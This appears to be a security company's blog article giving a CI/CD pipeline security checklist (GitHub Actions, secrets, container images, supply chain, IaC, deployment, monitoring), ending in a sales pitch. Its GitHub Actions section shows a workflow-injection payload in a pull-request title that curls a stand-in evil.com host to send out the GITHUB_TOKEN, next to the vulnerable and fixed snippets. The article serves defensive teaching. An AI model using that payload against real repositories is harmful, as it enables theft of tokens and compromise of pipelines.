Your CI/CD pipeline is probably the most privileged system in your entire infrastructure. It has access to production credentials, deployment keys, cloud provider tokens, container registries, and the ability to push code directly to your customers. It runs with more access than any individual developer on your team. And in most organizations, it is one of the least secured components in the stack.
Attackers know this. The SolarWinds breach started with a compromised build pipeline. The Codecov incident exposed secrets from thousands of CI environments. The ua-parser-js and event-stream supply chain attacks weaponized the automated trust that pipelines place in upstream dependencies. These were not hypothetical scenarios or CTF challenges. They were production incidents that affected millions of users.
The problem is not that engineering teams are negligent. It is that CI/CD security falls into a gap between responsibilities. Developers own the pipeline configuration but think of it as a build tool, not a security boundary. Security teams audit the application code but rarely look at the .github/workflows/ directory or the Terraform modules that provision the pipeline infrastructure. The result is a high-value target that nobody is actively defending.
This article is the checklist we wish every engineering team had before their first production deployment. It covers the full attack surface of a modern CI/CD pipeline, from secret management to supply chain integrity, with specific, actionable guidance you can implement this week.
Why CI/CD pipelines are high-value targets
To understand why pipeline security matters, you need to think about what your CI/CD system actually has access to. In a typical setup, the pipeline can:
- Read and write to your source code repositories, including private repos containing proprietary business logic, internal tools, and infrastructure configuration
- Access production database credentials, API keys, encryption keys, and signing certificates needed for deployment
- Push container images to your registry and deploy them directly to production Kubernetes clusters or serverless platforms
- Modify cloud infrastructure through Terraform, CloudFormation, or Pulumi with IAM roles that often have far more permissions than necessary
- Access customer data indirectly through integration tests, database migrations, and seed scripts that run against production or production-adjacent environments
- Communicate with external services including package registries, notification systems, monitoring platforms, and third-party APIs
A compromised pipeline is not just a build system issue. It is a direct path to production, to customer data, and to every secret your application depends on. An attacker who gains control of your CI/CD pipeline effectively has the combined access of every service account, deployment key, and production credential that the pipeline uses.
The asymmetry is the problem. A developer laptop compromise gives an attacker access to whatever that developer can reach. A pipeline compromise gives the attacker access to everything the pipeline can reach, which in most organizations is everything in production. This is why pipeline security is not a "nice to have" -it is the single highest-leverage security investment most engineering teams can make.
Common CI/CD security failures
Before we get to the checklist, let us catalog the most common ways pipelines get compromised. These are not theoretical attacks. Every one of these patterns has been exploited in real-world incidents affecting real companies.
Secrets exposed in logs
- Build logs contain environment variables, command outputs, or debug information that includes credentials
- Secret masking is not enabled or does not cover all secret formats
- Error messages from failed API calls include authentication headers or tokens in plaintext
- Build artifacts or test reports are stored with embedded credentials
Overprivileged service accounts
- Pipeline service accounts have full admin access to cloud providers instead of scoped IAM roles
- A single set of credentials is shared across all pipeline stages (build, test, deploy to staging, deploy to production)
- Service accounts are never rotated and have no expiration policy
- The same token that runs unit tests can also push to production
Unsigned and unverified artifacts
- Container images are built and deployed without content trust or signature verification
- No chain of custody exists between what was built and what was deployed
- An attacker who compromises the artifact registry can replace a legitimate image with a malicious one
- Build provenance is not recorded, making incident response nearly impossible
Dependency confusion
- Internal package names are not reserved on public registries, allowing an attacker to publish a malicious package with the same name
- Package managers resolve public packages before private ones by default
- Lockfiles are not committed or are not enforced during CI builds
- No integrity checks (checksums, signatures) on downloaded dependencies
If any of these sound familiar, you are not alone. In our experience conducting secure code reviews, at least three of these four patterns are present in the majority of CI/CD configurations we examine. The good news is that every one of them is fixable with the right configuration and practices.
GitHub Actions security
GitHub Actions is the most widely used CI/CD platform for modern software teams, and it has its own unique attack surface that deserves dedicated attention. The convenience features that make Actions easy to use are often the same features that create security vulnerabilities.
Workflow injection attacks
The most dangerous class of GitHub Actions vulnerabilities is workflow injection. This occurs when untrusted data from a pull request, issue, or comment is interpolated directly into a workflow using the ${{ }} expression syntax.
# VULNERABLE: Attacker-controlled PR title is injected into a shell command
- name: Print PR title
run: echo "PR: ${{ github.event.pull_request.title }}"
# An attacker can set their PR title to:
# "; curl https://evil.com/steal?token=$GITHUB_TOKEN #
# which breaks out of the echo and exfiltrates the token
The fix is to never interpolate untrusted expressions directly into run: blocks. Instead, pass them through environment variables, which are not subject to shell injection:
# SAFE: PR title is passed as an environment variable
- name: Print PR title
run: echo "PR: $PR_TITLE"
env:
PR_TITLE: ${{ github.event.pull_request.title }}
This applies to any GitHub context value that can be influenced by an external contributor: github.event.pull_request.title, github.event.pull_request.body, github.event.issue.title, github.event.comment.body, github.head_ref, and branch names in general.
GITHUB_TOKEN permissions
By default, the GITHUB_TOKEN in a workflow has broad read/write permissions across the repository. This is far more access than most workflows need. Restrict it at the workflow level:
permissions:
contents: read
pull-requests: write
# Only grant the specific permissions this workflow needs
# Never use permissions: write-all
You should also enable the organization-level setting that restricts the default GITHUB_TOKEN to read-only. This forces every workflow to explicitly declare the permissions it needs, following the principle of least privilege.
Third-party action risks
Every uses: directive in a GitHub Actions workflow is a trust decision. When you reference actions/checkout@v4, you are running code from a third-party repository inside your pipeline with full access to your repository secrets and GITHUB_TOKEN. Common mistakes include:
- Pinning to a mutable tag:
uses: some-action@v2can be changed by the action maintainer at any time. An account compromise or malicious update can inject code into every pipeline that uses that action. - Not pinning at all:
uses: some-action@mainruns whatever is currently on the main branch, including anything pushed in the last five minutes. - Using unvetted actions: The GitHub Actions marketplace has no meaningful security review process. Anyone can publish an action, and many popular actions have had security vulnerabilities.
The mitigation is to pin every action to a specific commit SHA, not a tag or branch:
# VULNERABLE: Mutable tag can be changed by the action maintainer
uses: actions/checkout@v4
# SAFE: Pinned to immutable commit SHA
uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1
Tools like Dependabot and Renovate can automatically create pull requests to update these SHA pins when new versions are released, so you get both security and convenience.
Secret management in pipelines
Secrets are the crown jewels of your CI/CD pipeline, and they are frequently mismanaged. The goal is simple: secrets should be available to the pipeline stages that need them, invisible to everything else, and rotated frequently enough that a compromised secret has a limited blast radius.
What not to do
- Hardcode secrets in pipeline configuration files. This includes
.github/workflows/YAML files, Jenkinsfiles,.gitlab-ci.yml, and any other pipeline definition committed to source control. These files are visible to anyone with repository access. - Pass secrets as command-line arguments. Most operating systems log process arguments, and they appear in
/procon Linux. If your pipeline runsdeploy --api-key=sk-live-abc123, that key may be visible in process listings. - Store secrets in environment variables defined in the pipeline UI without masking. Many CI platforms do not mask secrets by default in build logs, and even those that do can be bypassed with creative output formatting.
- Use the same secret across all environments. Your staging API key should not be the same as your production API key. If staging is compromised, production should not be affected.
Vault integration
The gold standard for pipeline secret management is a dedicated secrets vault (HashiCorp Vault, AWS Secrets Manager, Google Secret Manager, or Azure Key Vault) with short-lived, dynamically generated credentials. Instead of storing a long-lived database password in your CI platform, the pipeline requests a temporary credential from the vault at the start of each run. That credential expires automatically, typically within minutes or hours.
This approach provides several advantages:
- No static credentials to steal. Even if an attacker exfiltrates the pipeline's credential, it expires before they can use it.
- Full audit trail. The vault logs every credential request, so you know exactly which pipeline run accessed which secrets.
- Centralized rotation. Rotating a secret in the vault immediately affects all pipelines that use it, without updating CI configuration.
- Scoped access. Each pipeline stage can be granted access to only the secrets it needs, enforced at the vault level.
Secret rotation
Every secret used by your pipeline should have a defined rotation schedule. For most credentials, 90 days is the maximum acceptable lifetime. For high-value secrets (production database credentials, signing keys, cloud provider root tokens), 30 days or less is appropriate. Ideally, secrets should be ephemeral: generated at the start of a pipeline run and destroyed at the end.
Automate rotation wherever possible. Manual rotation is a policy that will be ignored under deadline pressure. Automated rotation through your vault or cloud provider's native rotation features ensures it actually happens.
Container image security in build pipelines
If your pipeline builds and deploys container images, the image build process is a critical security boundary. A compromised or misconfigured image build can introduce vulnerabilities that bypass every other security control in your stack.
Base image selection and maintenance
- Use minimal base images.
alpine,distroless, orscratchimages have a fraction of the attack surface of fullubuntuordebianimages. Fewer packages mean fewer CVEs to patch. - Pin base image digests. Use
FROM node:20-alpine@sha256:abc123...instead ofFROM node:20-alpine. Tags are mutable. Digests are not. - Rebuild images regularly. Even if your application code has not changed, base image updates may include critical security patches. Automate weekly or daily rebuilds.
- Do not run as root. Your Dockerfile should include a
USERdirective to run the application as a non-root user. This limits the impact of container escape vulnerabilities.
Image scanning in the pipeline
Integrate a container image scanner (Trivy, Grype, Snyk Container, or similar) into your pipeline that runs after the image build and before the image push. The scan should:
- Fail the build if critical or high-severity CVEs are detected in OS packages or application dependencies
- Detect hardcoded secrets, credentials, or private keys baked into the image layers
- Check for misconfigurations: running as root, unnecessary capabilities, exposed ports that should not be public
- Generate a report that is stored as a build artifact for audit purposes
Image signing and verification
Use Cosign (from the Sigstore project) or Docker Content Trust to sign every image your pipeline produces. Then configure your deployment targets (Kubernetes admission controllers, ECS task definitions, etc.) to reject unsigned or incorrectly signed images. This creates a chain of trust: only images built by your pipeline can be deployed to your infrastructure.
# Sign the image after building
cosign sign --key cosign.key $IMAGE_REGISTRY/$IMAGE_NAME:$TAG
# Verify the signature before deploying
cosign verify --key cosign.pub $IMAGE_REGISTRY/$IMAGE_NAME:$TAG
SAST, DAST, and SCA integration points
A mature DevSecOps pipeline integrates multiple categories of security testing at the right points in the development lifecycle. The key is knowing what each tool type does and where it belongs.
| Tool Type | What It Tests | Where in the Pipeline | Limitations |
|---|---|---|---|
| SAST | Source code for known vulnerability patterns, insecure API usage, and taint flows | On every pull request, before merge. Block merge on critical findings. | High false positive rates. Cannot detect logic flaws, business logic bypasses, or authorization issues. |
| SCA | Dependencies for known CVEs, license violations, and end-of-life packages | On every pull request and on a scheduled nightly scan of the default branch. | Only finds known vulnerabilities with assigned CVEs. Zero-day and unreported vulnerabilities are invisible. |
| DAST | Running application for injection flaws, misconfigurations, and authentication issues from an external perspective | After deployment to a staging or QA environment. Run against a full application stack. | Slow. Cannot test all code paths. Requires a running application. Best used as a complement to SAST, not a replacement. |
| Secret Scanning | Code, configuration, and commit history for accidentally committed credentials | Pre-commit hook (developer machine) and post-commit CI check. Both. | Pattern-based detection. Custom or non-standard secret formats may be missed. Historical secrets in git history need separate tools. |
| IaC Scanning | Terraform, CloudFormation, Kubernetes manifests for misconfigurations | On every pull request that modifies infrastructure code. Block merge on high-severity findings. | Cannot detect runtime drift. Configuration may be correct in code but overridden manually in the cloud console. |
The critical mistake teams make is running all these tools but not acting on the results. A SAST scanner that produces 500 findings that nobody triages is worse than having no scanner at all, because it creates a false sense of security. Start with one tool per category, tune it to eliminate false positives, and enforce a policy that findings must be triaged within a defined SLA. As we covered in our secure code review guide, automated scanning is a complement to manual review, not a replacement for it.
Supply chain security
Your application is not just the code your team writes. It is your code plus every dependency, transitive dependency, build tool, base image, and third-party integration that your pipeline pulls in. Supply chain attacks target these trust relationships, and they are becoming more common every year.
Verifying dependencies
- Commit lockfiles and enforce them in CI. Your
package-lock.json,yarn.lock,Pipfile.lock,go.sum, orCargo.lockshould be committed to the repository and enforced during CI builds withnpm ci(notnpm install),pip install --require-hashes, or the equivalent for your package manager. This ensures that the exact versions and checksums that a developer vetted locally are the same versions used in production. - Verify package integrity. Modern package managers support integrity checking via checksums. Enable it. If someone tampers with a package on the registry, the checksum mismatch will fail your build instead of deploying the compromised version.
- Review dependency updates before merging. Automated dependency update PRs from Dependabot or Renovate should be reviewed, not auto-merged. Check the changelog, look at the diff, and verify the publisher has not changed unexpectedly.
- Reserve your internal package names on public registries. If your organization uses private packages named
@company/auth-utils, register that name on npm (or your public registry) even if you never publish to it. This prevents dependency confusion attacks where an attacker publishes a public package with the same name as your private one.
SBOM generation
A Software Bill of Materials (SBOM) is an inventory of every component in your application, including versions, licenses, and provenance information. Generate an SBOM as part of your pipeline and store it alongside every release artifact. When the next Log4Shell-scale vulnerability drops, you will be able to determine within minutes whether your application is affected, instead of scrambling to audit every service manually.
Tools like Syft, Trivy, and CycloneDX can generate SBOMs in standard formats (SPDX, CycloneDX) directly from your container images or application manifests. Store them in a registry alongside the artifact they describe, and integrate them with your vulnerability management platform for continuous monitoring. For more on managing your software supply chain risks, see our dedicated guide.
Infrastructure as Code scanning
If your pipeline deploys infrastructure changes through Terraform, CloudFormation, Pulumi, or Kubernetes manifests, those configuration files are part of your security surface. A misconfigured S3 bucket policy or an overprivileged IAM role defined in Terraform is just as dangerous as a SQL injection in your application code.
Common IaC misconfigurations
- Public S3 buckets or storage containers with ACLs that allow unauthenticated access to sensitive data
- Security groups or firewall rules that allow
0.0.0.0/0ingress on management ports (SSH, RDP, database ports) - IAM roles with wildcard permissions (
"Action": "*","Resource": "*") that violate least privilege - Unencrypted storage for databases, EBS volumes, or message queues that should be encrypted at rest
- Missing logging and monitoring on critical resources (CloudTrail disabled, VPC flow logs missing, database audit logs turned off)
- Kubernetes manifests that run containers as root, mount the host filesystem, or disable security contexts
Integrating IaC scanning
Tools like Checkov, tfsec, KICS, and Bridgecrew scan your infrastructure code for these misconfigurations before they reach your cloud environment. Integrate them into your pipeline so that:
- Every pull request that modifies
*.tf,*.yaml(Kubernetes/CloudFormation), or other IaC files triggers a scan - High and critical severity findings block the merge
- Medium and low findings are tracked as technical debt with a defined remediation timeline
- Custom policies enforce your organization-specific requirements (e.g., "all resources must have cost allocation tags" or "all databases must use customer-managed encryption keys")
The shift-left principle applies here just as it does to application security. Catching a misconfigured security group in a pull request is orders of magnitude cheaper than discovering it after an attacker has already used it to access your database.
Branch protection and code review enforcement
Your pipeline is only as secure as the process that governs what code enters it. Without proper branch protection, a single compromised developer account can push malicious code directly to the main branch and trigger a production deployment with no review.
Minimum branch protection rules
- Require pull requests for all changes to the default branch. No direct pushes, no exceptions. This applies to repository administrators as well.
- Require at least one approval from a code owner. Use CODEOWNERS files to ensure that changes to sensitive files (pipeline configuration, IaC, authentication code, deployment scripts) require approval from the appropriate team.
- Require status checks to pass. All CI checks (tests, SAST, SCA, linting) must pass before a pull request can be merged. Do not allow bypassing failed checks.
- Require signed commits. GPG or SSH commit signing verifies that commits were actually created by the developer who claims to have created them. This prevents an attacker from pushing commits impersonating a trusted developer.
- Dismiss stale approvals. If a pull request is approved and then additional commits are pushed, the approval should be dismissed and a new review required. This prevents an attacker from getting a benign PR approved and then pushing malicious code before merge.
- Restrict force pushes and branch deletion. Force pushes can rewrite history to hide malicious commits. Branch deletion can disrupt auditing. Both should be restricted to a small number of administrators.
Pipeline configuration as code is code. Your .github/workflows/, Jenkinsfile, .gitlab-ci.yml, and Dockerfile should be subject to the same review requirements as your application code. A change to the deployment pipeline is at least as impactful as a change to any application endpoint. Require code owner approval for all pipeline configuration changes.
Deployment security
The final stage of the pipeline - getting code from a build artifact to a production environment - is where many security controls are either enforced or bypassed. A secure deployment process ensures that only tested, reviewed, and authorized changes reach production.
Immutable artifacts
Once an artifact (container image, compiled binary, bundled application) passes your CI checks, it should be stored in an immutable artifact registry and deployed without modification. The exact artifact that was tested is the exact artifact that gets deployed. No rebuilding, no recompiling, no "quick patches" applied between staging and production.
This principle eliminates an entire class of attacks where the build output is modified between the test phase and the deployment phase. Tag your artifacts with the git commit SHA they were built from, sign them, and verify the signature at deployment time.
Approval gates
Production deployments should require explicit approval from authorized team members. This is not about slowing down deployments. It is about ensuring that a compromised CI system or a rogue automation cannot push code to production without a human in the loop. Modern CI/CD platforms support environment-level approvals:
- GitHub Actions: Use environment protection rules that require reviewer approval before a deployment job targeting the
productionenvironment can execute - GitLab CI: Use
when: manualfor production deployment stages with protected environments - CircleCI: Use approval jobs in workflows to gate production deployments
The approval should include a review of what is actually being deployed: the commit range, the changelog, the test results, and the security scan outputs. An approval gate that rubber-stamps every deployment provides no value.
Rollback capability
Secure deployments include the ability to quickly roll back to a known-good state. If a deployment introduces a security vulnerability (or if a compromised artifact makes it past your controls), the time to detect and revert is the primary factor in limiting blast radius. Ensure your deployment process supports:
- One-command rollback to any previous artifact version
- Canary deployments that expose new versions to a small percentage of traffic before full rollout
- Automated rollback triggers based on error rates, latency thresholds, or security signals
- An immutable audit log of every deployment, including who approved it, what was deployed, and when
Monitoring and alerting for pipeline anomalies
Prevention is essential, but detection is the safety net. Even with every control in this checklist implemented, you need visibility into anomalous pipeline behavior that could indicate a compromise in progress.
What to monitor
- Pipeline configuration changes: Any modification to workflow files, pipeline scripts, or deployment configuration should trigger an alert to the security team. These changes should be rare and reviewed carefully.
- Unusual build patterns: Builds triggered outside normal hours, by accounts that do not normally commit, or targeting branches that are not part of normal development workflows.
- Secret access patterns: If your vault integration logs access, monitor for secrets being accessed by pipeline runs that should not need them, or secrets being accessed more frequently than expected.
- Network egress from build environments: CI runners should have restricted network access. Outbound connections to unexpected destinations (especially data exfiltration to external servers) should trigger alerts.
- Failed security checks that are overridden: Track when developers or administrators bypass failed security gates. One or two overrides for known false positives is normal. A pattern of overrides may indicate someone is trying to push vulnerable code through the pipeline.
- New or modified third-party actions/integrations: When a workflow starts using a new GitHub Action or the SHA pin of an existing action changes, that should be flagged for review.
Centralized pipeline logging
Send all pipeline logs to a centralized, append-only logging system that is separate from the pipeline itself. If an attacker compromises your CI system, they should not be able to delete or modify the logs that would reveal the compromise. Use a SIEM or log aggregation platform (Datadog, Splunk, Elastic, or even a dedicated S3 bucket with object lock) to store and analyze pipeline audit data.
The DevSecOps maturity roadmap
Implementing everything in this article at once is not realistic for most teams. Security is a journey, not a destination. Here is a practical maturity roadmap that prioritizes the highest-impact controls first and builds toward a comprehensive DevSecOps practice over time.
1 Foundation (Week 1-2)
Enable branch protection rules on your default branch. Require pull requests, at least one review, and passing status checks. Move all secrets from pipeline configuration files to your CI platform's secret storage. Enable secret masking in build logs. Pin third-party actions to commit SHAs.
2 Automated Scanning (Week 3-4)
Add SCA scanning (Dependabot, Snyk, or Renovate) to flag known vulnerabilities in dependencies. Add a secret scanner (GitLeaks, TruffleHog) as a pre-commit hook and CI check. Commit and enforce lockfiles. Configure your package manager to use --frozen-lockfile or npm ci in CI.
3 Pipeline Hardening (Month 2)
Restrict GITHUB_TOKEN permissions to the minimum required per workflow. Implement least-privilege service accounts with separate credentials per environment. Add container image scanning if you deploy containers. Set up IaC scanning for infrastructure code. Require signed commits from all contributors.
4 Advanced Controls (Month 3)
Integrate a secrets vault for dynamic, short-lived credentials. Implement image signing and verification with Cosign. Add SAST scanning to pull request checks. Set up deployment approval gates for production environments. Generate and store SBOMs with every release.
5 Continuous Improvement (Ongoing)
Add DAST scanning against staging environments. Implement canary deployments with automated rollback. Set up centralized pipeline logging and anomaly detection. Conduct regular pipeline security audits. Establish a secret rotation schedule and automate it. Run tabletop exercises simulating pipeline compromise scenarios.
Each stage builds on the previous one. Do not skip ahead to image signing before you have branch protection and secret management in place. The foundations matter more than the advanced controls, because they address the most common and most easily exploited attack vectors.
Putting it into practice
CI/CD pipeline security is not a separate discipline from application security. It is the foundation that everything else builds on. The most thoroughly reviewed application code in the world is meaningless if an attacker can modify it during the build process, inject malicious dependencies, steal deployment credentials, or push a compromised artifact directly to production.
Start with the foundation: branch protection, secret management, and dependency integrity. Then layer on automated scanning, image security, and deployment controls. Finally, add monitoring and detection to catch what prevention misses. The roadmap above gives you a realistic timeline, but the most important step is the first one.
If you are not sure where your pipeline stands, a security code review that includes pipeline configuration analysis will identify the gaps and give you a prioritized remediation plan. The vulnerabilities in your CI/CD system are not hypothetical risks. They are the attack vectors that sophisticated adversaries are actively exploiting, and the window between "we should fix that" and "we just got breached" is shorter than most teams realize.
Need help securing your pipeline and codebase?
Our security engineers review your CI/CD configuration, pipeline code, and deployment architecture alongside your application source code. We identify the vulnerabilities that automated tools miss and deliver a prioritized remediation plan your team can act on immediately.